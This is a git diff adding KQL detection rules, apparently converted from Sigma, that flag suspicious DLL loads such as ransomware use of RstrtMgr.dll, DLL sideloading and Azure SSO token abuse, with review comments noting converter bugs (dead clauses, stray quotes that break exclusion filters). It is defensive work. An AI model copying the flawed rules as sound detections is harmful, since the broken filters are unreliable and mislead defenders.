@@ -0,0 +1,14 @@ +// Title: Load Of RstrtMgr.DLL By A Suspicious Process +// Author: Luc Génaux +// Date: 2023-11-28 +// Level: high +// Description: Detects the load of RstrtMgr DLL (Restart Manager) by a suspicious process. +// This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows. +// It could also be used for anti-analysis purposes by shut downing specific processes. +// MITRE Tactic: Impact +// Tags: attack.impact, attack.defense-evasion, attack.t1486, attack.t1562.001 +// False Positives: +// - Processes related to software installation + +DeviceImageLoadEvents +| where (FolderPath endswith "\\RstrtMgr.dll" or InitiatingProcessVersionInfoOriginalFileName =~ "RstrtMgr.dll") and ((InitiatingProcessFolderPath contains ":\\Perflogs\\" or InitiatingProcessFolderPath contains ":\\Users\\Public\\" or InitiatingProcessFolderPath contains "\\Temporary Internet") or ((InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Favorites\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Favourites\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Contacts\\"))) \ No newline at end of file diff --git a/KQL/rules/windows/image_load/load_of_rstrtmgr_dll_by_an_uncommon_process.kql b/KQL/rules/windows/image_load/load_of_rstrtmgr_dll_by_an_uncommon_process.kql new file mode 100644 index 00000000..157e46ac --- /dev/null +++ b/KQL/rules/windows/image_load/load_of_rstrtmgr_dll_by_an_uncommon_process.kql 
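Review bot: The `InitiatingProcessVersionInfoOriginalFileName =~ "RstrtMgr.dll"` branch compares the loading process's original file name against a DLL name, so it is dead code; the Sigma source's `OriginalFileName` on this image-load rule describes the loaded image, for which DeviceImageLoadEvents has, as far as I know, no equivalent column. Detection is therefore carried solely by `FolderPath endswith "\\RstrtMgr.dll"`, and a renamed copy of the library is not caught, which the rule text does not admit. I would drop the dead clause and record the gap next to the query: `// renamed copies not covered: MDE exposes no OriginalFileName for the loaded image`. The same mapping recurs in the sibling RstrtMgr and CredUI rules in this batch, so the fix belongs in the converter's image_load field map rather than in each generated file.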
@@ -0,0 +1,15 @@ +// Title: Load Of RstrtMgr.DLL By An Uncommon Process +// Author: Luc Génaux +// Date: 2023-11-28 +// Level: low +// Description: Detects the load of RstrtMgr DLL (Restart Manager) by an uncommon process. +// This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows. +// It could also be used for anti-analysis purposes by shut downing specific processes. +// MITRE Tactic: Impact +// Tags: attack.impact, attack.defense-evasion, attack.t1486, attack.t1562.001 +// False Positives: +// - Other legitimate Windows processes not currently listed +// - Processes related to software installation + +DeviceImageLoadEvents +| where (FolderPath endswith "\\RstrtMgr.dll" or InitiatingProcessVersionInfoOriginalFileName =~ "RstrtMgr.dll") and (not((InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\'" or (InitiatingProcessFolderPath startswith "C:\\$WINDOWS.~BT\\'" or InitiatingProcessFolderPath startswith "C:\\$WinREAgent\\'" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\'" or InitiatingProcessFolderPath startswith "C:\\Program Files\\'" or InitiatingProcessFolderPath startswith "C:\\ProgramData\\'" or InitiatingProcessFolderPath startswith "C:\\Windows\\explorer.exe'" or InitiatingProcessFolderPath startswith "C:\\Windows\\SoftwareDistribution\\'" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysNative\\'" or InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\'" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\'" or InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\'" or InitiatingProcessFolderPath startswith "C:\\WUDownloadCache\\'") or ((InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\is-" and InitiatingProcessFolderPath contains ".tmp\\") and InitiatingProcessFolderPath endswith ".tmp" and 
InitiatingProcessFolderPath startswith "C:\\Users\\'")))) and (not((InitiatingProcessFolderPath endswith "\\AppData\\Local\\Microsoft\\OneDrive\\OneDriveStandaloneUpdater.exe" and InitiatingProcessFolderPath startswith "C:\\Users\\"))) \ No newline at end of file diff --git a/KQL/rules/windows/image_load/microsoft_excel_add_in_loaded_from_uncommon_location.kql b/KQL/rules/windows/image_load/microsoft_excel_add_in_loaded_from_uncommon_location.kql new file mode 100644 index 00000000..0ed18510 --- /dev/null +++ b/KQL/rules/windows/image_load/microsoft_excel_add_in_loaded_from_uncommon_location.kql @@ -0,0 +1,12 @@ +// Title: Microsoft Excel Add-In Loaded From Uncommon Location +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-12 +// Level: medium +// Description: Detects Microsoft Excel loading an Add-In (.xll) file from an uncommon location +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204.002 +// False Positives: +// - Some tuning might be required to allow or remove certain locations used by the rule if you consider them as safe locations + +DeviceImageLoadEvents +| where (FolderPath contains "\\Desktop\\" or FolderPath contains "\\Downloads\\" or FolderPath contains "\\Perflogs\\" or FolderPath contains "\\Temp\\" or FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\Windows\\Tasks\\") and FolderPath endswith ".xll" and InitiatingProcessFolderPath endswith "\\excel.exe" \ No newline at end of file diff --git a/KQL/rules/windows/image_load/microsoft_office_dll_sideload.kql b/KQL/rules/windows/image_load/microsoft_office_dll_sideload.kql new file mode 100644 index 00000000..cc3a6a0c --- /dev/null +++ b/KQL/rules/windows/image_load/microsoft_office_dll_sideload.kql 
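Review bot: Every path in the exclusion filter carries a stray trailing single quote — `"C:\\Windows\\System32\\'"`, `"C:\\Program Files\\'"`, `"C:\\Users\\'"` and the rest — so no real path ever starts with them, the `not(...)` wrapper is always true, and the rule fires on essentially every RstrtMgr.dll load including the System32, Program Files and Windows Update locations it was written to allowlist. This looks like a quoting bug in the converter (single quotes around the Sigma values surviving into the KQL literal) and it turns a level-low rule into a near-constant alert source. The fix is to strip the quote from each literal, e.g. `InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\"`, and to add a converter check that no emitted string literal ends in a bare `'`. Note that `"C:\\Windows\\explorer.exe'"` is a full file path under `startswith`, which is acceptable once the quote is removed; the Inno Setup `is-*.tmp` exclusion is also dead for the same reason.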
@@ -0,0 +1,12 @@ +// Title: Microsoft Office DLL Sideload +// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research) +// Date: 2022-08-17 +// Level: high +// Description: Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 +// False Positives: +// - Unlikely + +DeviceImageLoadEvents +| where FolderPath endswith "\\outllib.dll" and (not((FolderPath startswith "C:\\Program Files\\Microsoft Office\\OFFICE" or FolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\OFFICE" or FolderPath startswith "C:\\Program Files\\Microsoft Office\\Root\\OFFICE" or FolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\Root\\OFFICE"))) \ No newline at end of file diff --git a/KQL/rules/windows/image_load/microsoft_vba_for_outlook_addin_loaded_via_outlook.kql b/KQL/rules/windows/image_load/microsoft_vba_for_outlook_addin_loaded_via_outlook.kql new file mode 100644 index 00000000..61e657fb --- /dev/null +++ b/KQL/rules/windows/image_load/microsoft_vba_for_outlook_addin_loaded_via_outlook.kql @@ -0,0 +1,12 @@ +// Title: Microsoft VBA For Outlook Addin Loaded Via Outlook +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-02-08 +// Level: medium +// Description: Detects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by the outlook process +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204.002 +// False Positives: +// - Legitimate macro usage. Add the appropriate filter according to your environment + +DeviceImageLoadEvents +| where FolderPath endswith "\\outlvba.dll" and InitiatingProcessFolderPath endswith "\\outlook.exe" \ No newline at end of file 
diff --git a/KQL/rules/windows/image_load/mmc_loading_script_engines_dlls.kql b/KQL/rules/windows/image_load/mmc_loading_script_engines_dlls.kql
new file mode 100644
index 00000000..460baa31
--- /dev/null
+++ b/KQL/rules/windows/image_load/mmc_loading_script_engines_dlls.kql
@@ -0,0 +1,13 @@
+// Title: MMC Loading Script Engines DLLs
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-02-05
+// Level: medium
+// Description: Detects when the Microsoft Management Console (MMC) loads the DLL libraries like vbscript, jscript etc which might indicate an attempt
+// to execute malicious scripts within a trusted system process for bypassing application whitelisting or defense evasion.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1059.005, attack.t1218.014
+// False Positives:
+// - Legitimate MMC operations or extensions loading these libraries
+
+DeviceImageLoadEvents
+| where (FolderPath endswith "\\vbscript.dll" or FolderPath endswith "\\jscript.dll" or FolderPath endswith "\\jscript9.dll") and InitiatingProcessFolderPath endswith "\\mmc.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/pcre_net_package_image_load.kql b/KQL/rules/windows/image_load/pcre_net_package_image_load.kql
new file mode 100644
index 00000000..27eb3c9d
--- /dev/null
+++ b/KQL/rules/windows/image_load/pcre_net_package_image_load.kql
@@ -0,0 +1,10 @@
+// Title: PCRE.NET Package Image Load
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-10-29
+// Level: high
+// Description: Detects processes loading modules related to PCRE.NET package
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceImageLoadEvents
+| where FolderPath contains "\\AppData\\Local\\Temp\\ba9ea7344a4a5f591d6e5dc32a13494b\\"
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_7za_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_7za_dll_sideloading.kql new file mode 100644 index 00000000..a24b501c --- /dev/null +++ b/KQL/rules/windows/image_load/potential_7za_dll_sideloading.kql @@ -0,0 +1,12 @@ +// Title: Potential 7za.DLL Sideloading +// Author: X__Junior +// Date: 2023-06-09 +// Level: low +// Description: Detects potential DLL sideloading of "7za.dll" +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 +// False Positives: +// - Legitimate third party application located in "AppData" may leverage this DLL to offer 7z compression functionality and may generate false positives. Apply additional filters as needed. + +DeviceImageLoadEvents +| where FolderPath endswith "\\7za.dll" and (not(((FolderPath startswith "C:\\Program Files (x86)\\" or FolderPath startswith "C:\\Program Files\\") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\")))) \ No newline at end of file diff --git a/KQL/rules/windows/image_load/potential_antivirus_software_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_antivirus_software_dll_sideloading.kql new file mode 100644 index 00000000..d29ed7b6 --- /dev/null +++ b/KQL/rules/windows/image_load/potential_antivirus_software_dll_sideloading.kql 
@@ -0,0 +1,14 @@
+// Title: Potential Antivirus Software DLL Sideloading
+// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
+// Date: 2022-08-17
+// Level: medium
+// Description: Detects potential DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec...etc
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+// - Applications that load the same dlls mentioned in the detection section. Investigate them and filter them out if a lot FPs are caused.
+// - Dell SARemediation plugin folder (C:\Program Files\Dell\SARemediation\plugin\log.dll) is known to contain the 'log.dll' file.
+// - The Canon MyPrinter folder 'C:\Program Files\Canon\MyPrinter\' is known to contain the 'log.dll' file
+
+DeviceImageLoadEvents
+| where (FolderPath endswith "\\log.dll" and (not(((FolderPath in~ ("C:\\Program Files\\AVAST Software\\Avast\\log.dll", "C:\\Program Files (x86)\\AVAST Software\\Avast\\log.dll")) or (FolderPath in~ ("C:\\Program Files\\AVG\\Antivirus\\log.dll", "C:\\Program Files (x86)\\AVG\\Antivirus\\log.dll")) or (FolderPath startswith "C:\\Program Files\\Bitdefender Antivirus Free\\" or FolderPath startswith "C:\\Program Files (x86)\\Bitdefender Antivirus Free\\") or FolderPath startswith "C:\\Program Files\\Canon\\MyPrinter\\" or (InitiatingProcessFolderPath =~ "C:\\Program Files\\Dell\\SARemediation\\audit\\TelemetryUtility.exe" and (FolderPath in~ ("C:\\Program Files\\Dell\\SARemediation\\plugin\\log.dll", "C:\\Program Files\\Dell\\SARemediation\\audit\\log.dll"))))))) or (FolderPath endswith "\\qrt.dll" and (not((FolderPath startswith "C:\\Program Files\\F-Secure\\Anti-Virus\\" or FolderPath startswith "C:\\Program Files (x86)\\F-Secure\\Anti-Virus\\")))) or ((FolderPath endswith "\\ashldres.dll" or FolderPath endswith "\\lockdown.dll" or FolderPath endswith "\\vsodscpl.dll") and (not((FolderPath startswith "C:\\Program Files\\McAfee\\" or FolderPath startswith "C:\\Program Files (x86)\\McAfee\\")))) or (FolderPath endswith "\\vftrace.dll" and (not((FolderPath startswith "C:\\Program Files\\CyberArk\\Endpoint Privilege Manager\\Agent\\x32\\" or FolderPath startswith "C:\\Program Files (x86)\\CyberArk\\Endpoint Privilege Manager\\Agent\\x32\\")))) or (FolderPath endswith "\\wsc.dll" and (not(((FolderPath startswith "C:\\program Files\\AVAST Software\\Avast\\" or FolderPath startswith "C:\\program Files (x86)\\AVAST Software\\Avast\\") or (FolderPath startswith "C:\\Program Files\\AVG\\Antivirus\\" or FolderPath startswith "C:\\Program Files (x86)\\AVG\\Antivirus\\"))))) or (FolderPath endswith "\\tmdbglog.dll" and (not((FolderPath startswith "C:\\program Files\\Trend Micro\\Titanium\\" or FolderPath startswith "C:\\program Files (x86)\\Trend Micro\\Titanium\\")))) or (FolderPath endswith "\\DLPPREM32.dll" and (not((FolderPath startswith "C:\\program Files\\ESET" or FolderPath startswith "C:\\program Files (x86)\\ESET"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_appverifui_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_appverifui_dll_sideloading.kql
new file mode 100644
index 00000000..899523fe
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_appverifui_dll_sideloading.kql
@@ -0,0 +1,12 @@
+// Title: Potential appverifUI.DLL Sideloading
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-06-20
+// Level: high
+// Description: Detects potential DLL sideloading of "appverifUI.dll"
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+// - Unlikely
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\appverifUI.dll" and (not(((InitiatingProcessFolderPath in~ ("C:\\Windows\\SysWOW64\\appverif.exe", "C:\\Windows\\System32\\appverif.exe")) and (FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_avkkid_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_avkkid_dll_sideloading.kql
new file mode 100644
index 00000000..ac2e714e
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_avkkid_dll_sideloading.kql
@@ -0,0 +1,10 @@
+// Title: Potential AVKkid.DLL Sideloading
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-08-03
+// Level: medium
+// Description: Detects potential DLL sideloading of "AVKkid.dll"
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\AVKkid.dll" and (not(((FolderPath startswith "C:\\Program Files (x86)\\G DATA\\" or FolderPath startswith "C:\\Program Files\\G DATA\\") and (InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\G DATA\\" or InitiatingProcessFolderPath contains "C:\\Program Files\\G DATA\\") and InitiatingProcessFolderPath endswith "\\AVKKid.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_azure_browser_sso_abuse.kql b/KQL/rules/windows/image_load/potential_azure_browser_sso_abuse.kql
new file mode 100644
index 00000000..e1f42f90
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_azure_browser_sso_abuse.kql
@@ -0,0 +1,13 @@
+// Title: Potential Azure Browser SSO Abuse
+// Author: Den Iuzvyk
+// Date: 2020-07-15
+// Level: low
+// Description: Detects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and a user logs in with their Azure AD account) wanting to perform SSO authentication in the browser.
+// An attacker can use this to authenticate to Azure AD in a browser as that user.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+// - False positives are expected since this rules is only looking for the DLL load event. This rule is better used in correlation with related activity
+
+DeviceImageLoadEvents
+| where FolderPath =~ "C:\\Windows\\System32\\MicrosoftAccountTokenProvider.dll" and (not((InitiatingProcessFolderPath endswith "\\BackgroundTaskHost.exe" and (InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\")))) and (not(((InitiatingProcessFolderPath endswith "\\IDE\\devenv.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Visual Studio\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft Visual Studio\\")) or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\" or InitiatingProcessFolderPath endswith "\\WindowsApps\\MicrosoftEdge.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", "C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe"))) or ((InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeCore\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft\\EdgeCore\\")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "C:\\Program Files\\Internet Explorer\\iexplore.exe")) or isnull(InitiatingProcessFolderPath) or InitiatingProcessFolderPath endswith "\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_ccleanerdu_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_ccleanerdu_dll_sideloading.kql
new file mode 100644
index 00000000..ba4caee4
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_ccleanerdu_dll_sideloading.kql
@@ -0,0 +1,12 @@
+// Title: Potential CCleanerDU.DLL Sideloading
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-07-13
+// Level: medium
+// Description: Detects potential DLL sideloading of "CCleanerDU.dll"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+// - False positives could occur from other custom installation paths. Apply additional filters accordingly.
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\CCleanerDU.dll" and (not(((InitiatingProcessFolderPath endswith "\\CCleaner.exe" or InitiatingProcessFolderPath endswith "\\CCleaner64.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files\\CCleaner\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\CCleaner\\"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_ccleanerreactivator_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_ccleanerreactivator_dll_sideloading.kql
new file mode 100644
index 00000000..0236ab9d
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_ccleanerreactivator_dll_sideloading.kql
@@ -0,0 +1,12 @@
+// Title: Potential CCleanerReactivator.DLL Sideloading
+// Author: X__Junior
+// Date: 2023-07-13
+// Level: medium
+// Description: Detects potential DLL sideloading of "CCleanerReactivator.dll"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+// - False positives could occur from other custom installation paths. Apply additional filters accordingly.
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\CCleanerReactivator.dll" and (not((InitiatingProcessFolderPath endswith "\\CCleanerReactivator.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\CCleaner\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\CCleaner\\"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_chrome_frame_helper_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_chrome_frame_helper_dll_sideloading.kql
new file mode 100644
index 00000000..cbfbe203
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_chrome_frame_helper_dll_sideloading.kql
@@ -0,0 +1,10 @@
+// Title: Potential Chrome Frame Helper DLL Sideloading
+// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
+// Date: 2022-08-17
+// Level: medium
+// Description: Detects potential DLL sideloading of "chrome_frame_helper.dll"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\chrome_frame_helper.dll" and (not((FolderPath startswith "C:\\Program Files\\Google\\Chrome\\Application\\" or FolderPath startswith "C:\\Program Files (x86)\\Google\\Chrome\\Application\\"))) and (not(FolderPath contains "\\AppData\\local\\Google\\Chrome\\Application\\"))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_dcom_internetexplorer_application_dll_hijack_image_load.kql b/KQL/rules/windows/image_load/potential_dcom_internetexplorer_application_dll_hijack_image_load.kql
new file mode 100644
index 00000000..ab64fcea
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_dcom_internetexplorer_application_dll_hijack_image_load.kql
@@ -0,0 +1,10 @@
+// Title: Potential DCOM InternetExplorer.Application DLL Hijack - Image Load
+// Author: Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga
+// Date: 2020-10-12
+// Level: critical
+// Description: Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.t1021.002, attack.t1021.003
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\Internet Explorer\\iertutil.dll" and InitiatingProcessFolderPath endswith "\\Internet Explorer\\iexplore.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_dll_sideloading_of_dbgcore_dll.kql b/KQL/rules/windows/image_load/potential_dll_sideloading_of_dbgcore_dll.kql
new file mode 100644
index 00000000..aeecc73e
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_dll_sideloading_of_dbgcore_dll.kql
@@ -0,0 +1,12 @@
+// Title: Potential DLL Sideloading Of DBGCORE.DLL
+// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
+// Date: 2022-10-25
+// Level: medium
+// Description: Detects DLL sideloading of "dbgcore.dll"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+// - Legitimate applications loading their own versions of the DLL mentioned in this rule
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\dbgcore.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\" or FolderPath startswith "C:\\Program Files\\" or FolderPath startswith "C:\\Windows\\SoftwareDistribution\\" or FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SystemTemp\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) and (not(((FolderPath contains "opera\\Opera Installer Temp\\opera_package" and FolderPath endswith "\\assistant\\dbgcore.dll") or FolderPath endswith "\\Steam\\bin\\cef\\cef.win7x64\\dbgcore.dll")))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_dll_sideloading_of_dbghelp_dll.kql b/KQL/rules/windows/image_load/potential_dll_sideloading_of_dbghelp_dll.kql
new file mode 100644
index 00000000..ba5d5ce4
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_dll_sideloading_of_dbghelp_dll.kql
@@ -0,0 +1,12 @@
+// Title: Potential DLL Sideloading Of DBGHELP.DLL
+// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
+// Date: 2022-10-25
+// Level: medium
+// Description: Detects potential DLL sideloading of "dbghelp.dll"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+// - Legitimate applications loading their own versions of the DLL mentioned in this rule
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\dbghelp.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\" or FolderPath startswith "C:\\Program Files\\" or FolderPath startswith "C:\\Windows\\SoftwareDistribution\\" or FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SystemTemp\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) and (not(((FolderPath endswith "\\Anaconda3\\Lib\\site-packages\\vtrace\\platforms\\windll\\amd64\\dbghelp.dll" or FolderPath endswith "\\Anaconda3\\Lib\\site-packages\\vtrace\\platforms\\windll\\i386\\dbghelp.dll") or (FolderPath endswith "\\Epic Games\\Launcher\\Engine\\Binaries\\ThirdParty\\DbgHelp\\dbghelp.dll" or FolderPath endswith "\\Epic Games\\MagicLegends\\x86\\dbghelp.dll") or (FolderPath contains "opera\\Opera Installer Temp\\opera_package" and FolderPath endswith "\\assistant\\dbghelp.dll"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_dll_sideloading_of_dbgmodel_dll.kql b/KQL/rules/windows/image_load/potential_dll_sideloading_of_dbgmodel_dll.kql
new file mode 100644
index 00000000..071a7635
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_dll_sideloading_of_dbgmodel_dll.kql
@@ -0,0 +1,12 @@
+// Title: Potential DLL Sideloading Of DbgModel.DLL
+// Author: Gary Lobermier
+// Date: 2024-07-11
+// Level: medium
+// Description: Detects potential DLL sideloading of "DbgModel.dll"
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001
+// False Positives:
+// - Legitimate applications loading their own versions of the DLL mentioned in this rule
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\dbgmodel.dll" and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) and (not((FolderPath startswith "C:\\Program Files\\WindowsApps\\Microsoft.WinDbg_" or (FolderPath startswith "C:\\Program Files (x86)\\Windows Kits\\" or FolderPath startswith "C:\\Program Files\\Windows Kits\\"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_dll_sideloading_of_libcurl_dll_via_gup_exe.kql b/KQL/rules/windows/image_load/potential_dll_sideloading_of_libcurl_dll_via_gup_exe.kql
new file mode 100644
index 00000000..e17f83f8
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_dll_sideloading_of_libcurl_dll_via_gup_exe.kql
@@ -0,0 +1,10 @@
+// Title: Potential DLL Sideloading Of Libcurl.DLL Via GUP.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-05
+// Level: medium
+// Description: Detects potential DLL sideloading of "libcurl.dll" by the "gup.exe" process from an uncommon location
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
+
+DeviceImageLoadEvents
+| where (FolderPath endswith "\\libcurl.dll" and InitiatingProcessFolderPath endswith "\\gup.exe") and (not(InitiatingProcessFolderPath endswith "\\Notepad++\\updater\\GUP.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_dll_sideloading_of_mpsvc_dll.kql b/KQL/rules/windows/image_load/potential_dll_sideloading_of_mpsvc_dll.kql
new file mode 100644
index 00000000..8bcf8538
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_dll_sideloading_of_mpsvc_dll.kql
@@ -0,0 +1,12 @@
+// Title: Potential DLL Sideloading Of MpSvc.DLL
+// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema
+// Date: 2024-07-11
+// Level: medium
+// Description: Detects potential DLL sideloading of "MpSvc.dll".
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001
+// False Positives:
+// - Legitimate applications loading their own versions of the DLL mentioned in this rule.
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\MpSvc.dll" and (not((FolderPath startswith "C:\\Program Files\\Windows Defender\\" or FolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\" or FolderPath startswith "C:\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_dll_sideloading_of_mscorsvc_dll.kql b/KQL/rules/windows/image_load/potential_dll_sideloading_of_mscorsvc_dll.kql
new file mode 100644
index 00000000..891cc995
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_dll_sideloading_of_mscorsvc_dll.kql
@@ -0,0 +1,12 @@
